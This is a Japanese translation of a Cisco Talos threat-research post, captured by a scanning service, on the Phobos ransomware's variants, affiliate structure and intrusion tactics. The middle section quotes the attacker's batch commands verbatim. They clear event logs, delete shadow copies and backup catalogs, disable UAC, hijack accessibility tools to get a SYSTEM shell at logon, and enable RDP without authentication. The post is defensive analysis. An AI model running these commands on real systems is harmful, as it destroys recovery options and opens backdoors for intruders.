gblogs.cisco.com
Open in
urlscan Pro
2600:1901:0:5880::
Public Scan
URL:
https://gblogs.cisco.com/jp/2023/12/talos-understanding-the-phobos-affiliate-structure/
Submission: On October 10 via api from IN — Scanned from DE
Submission: On October 10 via api from IN — Scanned from DE
Form analysis 3 forms found in the DOM
GET https://gblogs.cisco.com/jp/
<form method="get" id="searchform" action="https://gblogs.cisco.com/jp/">
<input type="text" value="" name="s" id="s">
<input type="submit" value=" " class="searchSubmit">
</form>GET https://gblogs.cisco.com/jp/
<form method="get" id="searchform" action="https://gblogs.cisco.com/jp/">
<input type="text" value="" name="s" id="s">
<input type="submit" value=" " class="searchSubmit">
</form>POST https://gblogs.cisco.com/jp/wp-comments-post.php
<form action="https://gblogs.cisco.com/jp/wp-comments-post.php" method="post" id="commentform">
<p><label for="author">Comment *</label><br><textarea name="comment" id="comment" cols="60%" rows="10" tabindex="4"></textarea></p>
<p id="comments_name">
<label for="author">氏名 </label><input type="text" name="author" id="author" value="" size="22" tabindex="1">
</p>
<p><input name="submit" type="submit" id="submit" tabindex="5" value="送信">
<input type="hidden" name="comment_post_ID" value="49700" id="comment_post_ID">
<input type="hidden" name="comment_parent" id="comment_parent" value="0">
</p>
<p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="2871bd16c3"></p>
<p style="display: none !important;" class="akismet-fields-container" data-prefix="ak_"><label>Δ<textarea name="ak_hp_textarea" cols="45" rows="8" maxlength="100"></textarea></label><input type="hidden" id="ak_js_1" name="ak_js"
value="1728564124571">
<script>
document.getElementById("ak_js_1").setAttribute("value", (new Date()).getTime());
</script>
</p>
</form>Text Content
* Cisco.com/jp
* Blog Home
Cisco Japan Blog
Share
Cisco Japan Blog / 脅威リサーチ / Phobos アフィリエイトの構造と活動について
2023年12月6日 Leave a Comment
--------------------------------------------------------------------------------
脅威リサーチ
PHOBOS アフィリエイトの構造と活動について
2 min read
TALOS Japan
* Cisco Talos はこのほど、Phobos の活動の観察と、1,000 以上の Phobos のサンプル(VirusTotal で公開されている
2019 年以降のサンプル)の分析結果に基づき、最も多く使用されている Phobos
の亜種、アフィリエイトが使用する一般的な戦術、手法、手順(TTP)、Phobos アフィリエイトの構造の特徴を特定しました。
* 分析したサンプルで最も頻繁に見られたのは Eking、Eight、Elbie、Devos、Faust なので、これらが最も一般的な Phobos
の亜種だと Talos はある程度確信しています。
* アフィリエイトは似たような TTP を使用して Phobos
を展開しており、通常は価値の高いサーバーを攻撃対象にします。被害者に圧力をかけて身代金を支払わせているようです。
* Talos が観察したすべての攻撃については、復号できる秘密キーが 1 つしかないので、Phobos
ランサムウェアは元締めグループが厳重に管理しているとの確信をある程度持っています。
* Phobos が RaaS(Ransomware as a Service)として販売されている可能性を示すものもあります。Talos は、Phobos
攻撃に関連する数百の連絡先メールアドレスと ID を発見しました。Phobos マルウェアには、RaaS
アフィリエイトによく見られる分散したアフィリエイト基盤があることをうかがわせるものです。
最も多く使用されている PHOBOS の亜種の特定
Phobos ランサムウェアは Dharma/Crysis ランサムウェアの進化版です。サイバー犯罪グループの間で人気を博しているにもかかわらず、2019
年に初めて確認されて以来、開発は最小限にとどまっています。本ブログは、8Base ランサムウェアグループについてのこちらのブログで取り上げた Phobos
ランサムウェアに関する Talos の分析の続きになります。
Talos は、VirusTotal のサンプル量に基づいて、Phobos ランサムウェアファミリの中で最も多く使用されている亜種を 5
つ特定しました。分析したサンプルで特徴的と言えるのはマルウェアビルダーの構成設定だけだったので、この構成設定のいくつかのバリエーションを調査しました。サンプルにはすべて同じソースコードが含まれており、他の
Phobos
アフィリエイトによってすでにロックされているファイルは暗号化されないように構成されていましたが、展開されている亜種によって構成に若干の違いがありました。
たとえば 8Base ランサムウェアグループによって展開された Phobos のサンプルには、以下に示すように、暗号化の対象にしない Phobos
の他の亜種のリストが含まれていました。この構成エントリにはすべてのサンプルに共通する傾向があり、特定のサンプルの背後にいるグループの名称がリストの先頭に追加されていました。
過去の攻撃の名称と暗号化ループで無視されるファイル拡張子のリスト
サンプルの構成設定を抽出して Phobos の亜種を特定した後、Talos は最もよく見られた亜種と各 Phobos ランサムウェア攻撃に関連付けられた一意の
ID を照合することで、最も活発な動きを見せている Phobos アフィリエイトを特定しました。
* Eking:遅くとも 2019 年から活動しており、通常はアジア太平洋地域のユーザーを攻撃対象にしている。
* Eight:現在 8Base として活動しているグループが過去に行った攻撃だと考えられる。
* Elbie:同じく APAC 地域のユーザーを攻撃対象にしていると見られ、2022 年から活動している。
* Devos:2019 年から活動しているグループだが、攻撃対象や TTP についての報告は少ない。
* Faust:2022 年から活動している別の亜種で、特定の業界や地域を攻撃対象にしているわけではない。
通常、各亜種のサンプル間に見られる唯一の違いは、暗号化されたファイルの拡張子に使用される連絡先メールアドレスと、設定の 1
つに埋め込まれている身代金メモのみであり、他の設定はすべて同じです。Talos が分析した Phobos
のすべての亜種で使用されているファイル拡張子は、以下に示す例と同じテンプレートに従っています。<<ID>>
は攻撃対象のマシンのドライブのシリアル番号に置き換えられ、その右の数字は現在の攻撃の ID
です。次にランサムウェア攻撃者への連絡に使用される電子メール、最後に亜種を表す拡張子が追加されています。
.id[<>-3253].[musonn@airmail[.]cc].eking
電子メールアドレスのドットを囲む角括弧は読者の安全を守るために追加したものですが、それ以外の角括弧はすべての亜種で使用されている実際の拡張子の一部です。
次のグラフからわかるように、これらの亜種は過去数年間に何百もの異なる連絡先メールアドレスを使用してきました。
今回の調査期間中に各 Phobos 亜種によって使用された連絡先メールアドレスの数
これらのメールアドレスは通常、次に示す無料または安全な電子メールプロバイダーを使用して作成されます。
Phobos ランサムウェアに使用されている最も一般的な電子メールプロバイダー
また、攻撃を遂行するために ICQ、Jabber、QQ などのインスタントメッセージ
サービスを利用しているアフィリエイトも見受けられます。下の表には、各亜種用に攻撃者が選択したさまざまなプロバイダーを記載しています。
Devos Eight Elbie Eking Faust email[.]tg gmx[.]com tutanota[.]com tutanota[.]com
gmx[.]com cock[.]li aol[.]com onionmail[.]org airmail[.]cc tutanota[.]com
protonmail[.]com protonmail[.]com tuta[.]io aol[.]com onionmail[.]org
libertymail[.]net tutanota[.]com techmail[.]info firemail[.]cc waifu[.]club
qq[.]com onionmail[.]org cock[.]li tuta[.]io tuta[.]io pressmail[.]ch cock[.]li
privatemail[.]com protonmail[.]com gmail[.]com medmail[.]ch keemail[.]me
gmail[.]com cock[.]li airmail[.]cc tutanota[.]com mailfence[.]com yandex[.]ru
criptext[.]com mailfence[.]com cumallover[.]me zohomail[.]eu msgsafe[.]io
ctemplar[.]com xmpp[.]jp airmail[.]cc zohomail[.]com cyberfear[.]com gmx[.]com
zohomail[.]eu countermail[.]com ICQ@HONESTHORSE aol[.]com techmail[.]info
cock[.]li mailfence[.]com ICQ@VIRTUALHORSE msgsafe[.]io zohomail[.]com mail[.]fr
lenta[.]ru proton[.]me privatemail[.]com
Talos は、Devos アフィリエイトが QQ[.]com(中国のインスタントメッセージ アプリ)を使用していることと、8 つのアフィリエイトが
ICQ(現在はロシアの会社が所有しているインスタントメッセージ サービス)を使用していることを発見しました。また、Proton Mail
のように、他よりも安全だとみなされるサービスプロバイダーの使用も確認しています。こうしたプロバイダーの多様性は、Phobos
が分散したアフィリエイト基盤を持ち、RaaS として運営されている可能性があるという Talos の見解をさらに裏付けるものです。
上述したように、さまざまな電子メールサービスプロバイダーが使用されているだけでなく、亜種ごとに膨大な数の異なる連絡先メールアドレスが使用されています。このことから、これら各亜種の背後にいるのは単一の攻撃グループではなく、複数の攻撃グループが背後に存在し、電子メールが使用禁止にならないようにプロバイダーを転々としている可能性が高いと考えられます。
PHOBOS の不正侵入で明らかになった戦術、手法、手順
2023 年の初めに、Talos は Phobos の「Elbie」亜種に関連した不正侵入を確認しました。この攻撃で狙われたのは Exchange
サーバーです。その後侵入を拡大し、バックアップサーバー、データベースサーバー、ハイパーバイザーホストなど他のサーバーサイドのインフラを侵害しようとする動きがありました。攻撃者は、多数のシステムに同時にランサムウェアを展開しようとしたわけではなく、特定のインフラに対象を絞って、各システムに個別にランサムウェアを展開しようとしたようです。Talos
がこう判断する理由は、損害を大きくして被害者が支払いに応じる可能性を高める方法として、Phobos
のアフィリエイトは通常、被害者のネットワーク内の価値の高いサーバーを狙うからです。
攻撃者は Exchange サーバーに最初にアクセスした後、侵害を受けたユーザーの Desktop
ディレクトリに作業ディレクトリを作成し、次のようなさまざまなツールをドロップしようとしました。
* Process
Hacker:プロセス可視化ツール。ファイルやサービスを削除したり、プロセスを強制終了したりするために攻撃者が使用するカーネルモードドライバも含まれています。
* Automim:侵害を受けたホストでのログイン情報の自動収集を可能にするツールキット。LaZagne および Mimikatz
ユーティリティが含まれています。
* IObit File
Unlocker:他のアプリケーションによって開かれているファイルのロックを解除するツール。データベースや開いているドキュメント、同様に通常は開かれたままになっているファイルが暗号化される確率を高めるために攻撃者が使用します。
* Nirsoft Password Recovery
Toolkit:ブラウザや電子メールクライアントなどの一般的なアプリケーションのパスワードを抽出するために使用されるツールキット。
* Network
Scanner(NS.exe):開いているサービスがないかネットワークをスキャンし、ネットワークで侵入を拡大するために使用される実行ファイル。
* Angry IP Scanner:ネットワークをスキャンして開いているサービスを探し、見つかったマシンのネットワーク情報を特定するために使用されるツール。
攻撃者は、侵入後にさまざまな操作を実行するバッチファイルも多数ドロップしました。
あるバッチファイルは、侵害を受けたシステム上の Windows イベントログをクリアして、フォレンジック
アーティファクトを最小限に抑え、検出をより困難にします。
FOR /F "delims=" %%I IN ('WEVTUTIL EL') DO (WEVTUTIL CL "%%I")
ボリュームシャドウコピーを削除するバッチファイルもあります。おそらく、Phobos 展開後の復旧をより困難にするためのものです。
vssadmin delete shadows /all /quiet
wmic shadowcopy delete
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
exit
前回のブログで説明したように、上記のスクリプトは Phobos 構成に含まれており、暗号化プロセスが開始される前に抽出され、一時的に .BAT
ファイルとして保存されます。
さらに、Windows レジストリキーを構成するためのバッチファイルも作成されていました。Windows
ログオン画面に存在するユーザー補助機能を有効にし、事前の認証がなくても SYSTEM
レベルのコマンドプロンプトを起動できるようにするものです。これは永続化のメカニズムとして使用されている可能性があり、攻撃の後半で攻撃者が RDP
経由でシステムを完全に制御できるようになります。
このスクリプトはまず、以下のレジストリエントリを設定してシステムのユーザーアカウント制御(UAC)を無効にします。
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
次に、さまざまなユーザー補助機能を有効にするためのイメージファイル実行オプション(IFEO)のデバッガエントリを Windows
コマンドプロセッサに設定します。これにより、攻撃者は Windows
ログオン画面からユーザー補助機能を呼び出し、システム上で管理者特権でコマンドシェルを実行できるようになります。これらのアプリケーションのいずれかが起動されるたびに、指定されたデバッグアプリケーションが、昇格された権限で起動されます。次の例では
Windows コマンドプロセッサが指定されています。
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f /v Debugger /t REG_SZ /d "%windir%\system32\cmd.exe"
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe" /f /v Debugger /t REG_SZ /d "%windir%\system32\cmd.exe"
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HelpPane.exe" /f /v Debugger /t REG_SZ /d "%windir%\system32\cmd.exe"
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /f /v Debugger /t REG_SZ /d "%windir%\system32\cmd.exe"
最後に、RDP を有効にし、ネットワークレベルの認証を無効にするさまざまなレジストリエントリを設定します。
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v fDenyTSConnections /t REG_DWORD /d "00000000"
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v fAllowUnsolicited /t REG_DWORD /d "00000001"
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v UserAuthentication /t REG_DWORD /d "00000000"
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /f /v SecurityLayer /t REG_DWORD /d "00000001"
攻撃者がドロップした別のスクリプトは、侵害を受けたシステム上で次のようなサービス構成変更を実行していました。
sc config Dnscache start= auto
net start Dnscache
sc config SSDPSRV start= auto
net start SSDPSRV
sc config FDResPub start= auto
net start FDResPub
sc config upnphost start= auto
net start upnphost
次のコマンドの実行により、侵害を受けたホスト上でファイル共有が有効にされました。
dism /online /enable-feature /featurename:File-Services /NoRestart
攻撃者はさらに、攻撃全体で使用するさまざまなコンポーネントの検出を最小限に抑え、セキュリティ担当者への警告を防ぐために、侵害を受けたホスト上のエンドポイント保護ソフトウェアのアンインストールを試みていました。
防御が無効になり、永続化のメカニズムが有効になった後で、攻撃者は Phobos
ランサムウェアを展開し、サーバー内のファイルを暗号化しています。この事例の感染で発見された亜種は「Elbie」攻撃の一部であり、以前のブログで説明したのと同じ動作が見られました。プロセスの最後に、攻撃者への連絡方法の詳細が記載された身代金メモ「info.hta」がユーザーのデスクトップにドロップされています。
連絡先メールアドレスが表示された Phobos の「info.hta」のサンプル
PHOBOS の開発者とアフィリエイトの特定
Phobos
の攻撃とマルウェアのサンプルを分析した結果、このランサムウェアについてあまり知られていなかったアフィリエイトの構造と開発者にまつわる謎の解明に役立つ発見がいくつかありました。
Talos が確認した電子メールアドレスのバリエーションは、Phobos が RaaS である可能性を示すものです。VirusTotal で公開されている
Phobos の各亜種は、10 以上のメールアドレスと関連しています。これらのメールアドレスは連絡を維持する目的で被害者に提供されており、中には 200
近くの一意のメールアドレス(ドメインはさまざま)を使用しているものもありました。主な連絡先メールアドレスとして ICQ と Jabber
が使用された事例もあります。Phobos の背後にいるグループが 1
つだけという可能性は否定できないものの、攻撃者が連絡先メールアドレスをこれほど頻繁に変更するのは珍しいことです。多くのランサムウェア攻撃がわずか数個の連絡先メールアドレスを使って大成功を収めているのに対して、これでは余計な時間と労力がかかってしまいます。たとえば、別のブログで説明したように、8Base
ランサムウェアグループは Phobos を使用しています。このことを Talos
が確認したときに同グループが使用していた連絡先メールアドレスは「support@rexsdata[.]pro」の 1 つだけでした。
Talos はまた、Phobos
はランサムウェアの復号ツールの秘密キーを管理している元締めグループによって厳重に管理されている可能性があると考えています。Phobos
は、暗号化対象のファイルごとに、暗号化に使用するランダムな AES キーを生成します。次にこのキーと一部のメタデータを構成データに存在する RSA
キーで暗号化し、暗号化されたファイルの末尾にこのデータを保存します。つまり、ファイルを復号するには、その公開 RSA キーに対応する秘密キーが必要になります。
Talos が分析した Phobos のすべてのサンプルには、構成データに同じ公開 RSA キーが含まれていました。つまり、復号できる秘密キーは 1
つだけということになります。分析したすべてのサンプルに同じ公開キーが含まれていることから、単一の攻撃グループが秘密キーを管理していると Talos
では判断しています。Phobos の開発者は、アフィリエイトに復号サービスを提供し、手数料を得ている可能性があります。
Talos の調査では、VirusTotal
で見つかったこのサンプルのように、「Elbie」の亜種のサンプルを復号することを約束する復号ツールの亜種が実際に存在することが判明しました。ただし、復号ツールにはファイル自体にはない
2 つの情報が必要なので、このツールを使用してサンプルを復号することはできません。
base64 でエンコードされたデータの入力を求める Phobos の復号ツールの画面
最初に必要なのは、base64 でエンコードされた暗号化 BLOB データが含まれているファイルのようです。これはサンプルの復号に使用される RSA
秘密キーだと思われます。2 番目に必要な情報は、この BLOB
の内容を復号するために使用されるパスワードです。つまり、復号のために身代金を支払った被害者によってこの 2
つのデータが発見、共有されるか、データが漏洩した場合、RSA 秘密キーを回復できる可能性があります。
Phobos が元締めグループによって管理されているという Talos
の見解をさらに裏付けるものが、ランサムウェアの拡張子ブロックリストが細心の注意を払って更新されているという事実です。前述したように、他の Phobos
アフィリエイトによって以前にロックされたファイルについては、暗号化が回避されるようになっています。これは、ランサムウェアの構成設定のファイル拡張子ブロックリストに基づいています。この拡張子ブロックリストは、どのグループが同じベースサンプルを長期にわたって使用したかを示しているようです。マルウェアビルダーツールは通常、攻撃用のバイナリを生成する際、修正されたクリーンな「スタブ」バイナリをベースにします。このバイナリには、現在のビルドに必要な構成のペイロードがすべて設定されます。これは
Phobos では行われません。
Talos が分析した多くの Phobos のサンプルで見つかった拡張子ブロックリストには、過去の Phobos
の攻撃でロックされた新規ファイルの拡張子が登録され、継続的に更新されています。これは、ビルダーの背後に、過去にどのグループが Phobos
を使用したかを追跡する元締めグループが存在するという考えの裏付けとなるものかもしれません。Phobos
のアフィリエイトが互いの攻撃活動に干渉するのを防ぐことが目的だと考えられます。
カバレッジ
Cisco Secure Endpoint(旧 AMP for Endpoints)は、この記事で説明したマルウェアの実行を阻止するのに最適です。Cisco
Secure Endpoint の無料トライアルはこちらからお申し込みください。
Cisco Secure Web Appliance の Web スキャンは、悪意のある Web
サイトへのアクセスを防止し、上述したような攻撃で使用されるマルウェアを検出します。
Cisco Secure Email(旧 E メールセキュリティ)は、攻撃の一環として攻撃者が送りつける不正な電子メールをブロックします。Cisco
Secure Email の無料トライアルはこちらからお申し込みください。
Threat Defense Virtual、適応型セキュリティアプライアンス、Meraki MX など、Cisco Secure
Firewall(旧次世代ファイアウォールおよび Firepower NGFW)アプライアンスは、この脅威に関連する悪意のあるアクティビティを検出できます。
Cisco Secure Malware Analytics(Threat
Grid)は、悪意のあるバイナリを特定し、シスコのすべてのセキュリティ製品に保護機能を組み込みます。
Umbrella(シスコのセキュア インターネット ゲートウェイ(SIG))は、社内ネットワークの内外で悪意のあるドメイン、IP、URL
への接続をブロックします。Umbrella の無料トライアルはこちらからお申し込みください。
Cisco Secure Web Appliance(旧 Web
セキュリティアプライアンス)は、危険性のあるサイトを自動的にブロックし、ユーザーがアクセスする前に疑わしいサイトを検査します。
特定の環境および脅威データに対する追加の保護機能は、Firewall Management Center から入手できます。
Cisco Duo は、ユーザーに多要素認証を提供し、承認されたユーザーのみがネットワークにアクセスできるようにします。
ClamAV で、次の脅威を検出できます。
Win.Packed.Zusy
Win.Ransomware.8base
Win.Downloader.Generic
Win.Ransomware.Ulise
IOC
この脅威に関連する IOC は、こちらをご覧ください。
> 本稿は 2023 年 11 月 17 日に Talos Group のブログに投稿された「Understanding the Phobos
> affiliate structure and activity」の抄訳です。
>
>
Share
AUTHORS
TALOS JAPAN
Tags:
* ランサムウェア 注目の脅威
コメントを書く
Comment *
氏名
Δ
* Connect
*
*
*
お問い合わせ
|
フィードバック
|
このサイトについて
|
サイトマップ
|
ご利用条件
|
情報セキュリティ基本方針
|
プライバシー
|
クッキーポリシー
|
商標
免責事項
本サイトに情報を掲載する個人(管理人を含みます)は、シスコの社員である場合があります。本サイトおよび対応するコメントにおいて表明される意見は、投稿者本人の個人的意見であり、シスコの意見ではありません。本サイトの内容は、情報の提供のみを目的として掲載されており、シスコや他の関係者による推奨や表明を目的としたものではありません。このサイトは一般公開されています。機密情報はこのサイトに掲載しないでください。各利用者は、本Webサイトへの掲載により、投稿、リンクその他の方法でアップロードした全ての情報の内容に対して全責任を負い、本Web
サイトの利用に関するあらゆる責任からシスコを免責することに同意したものとします。また、各利用者は、シスコに対し、本サイトに提供した情報内容に関する著作権、パブリシティ権および著作者人格権を行使するための全世界において有効な、無期限、取消不能、使用料無料且つ許諾料全額支払い済みの、譲渡可能な権利(サブライセンスする権利を含みます)を付与するものとします。全てのコメントは管理されます。コメントは管理人による承認後速やかに表示されます。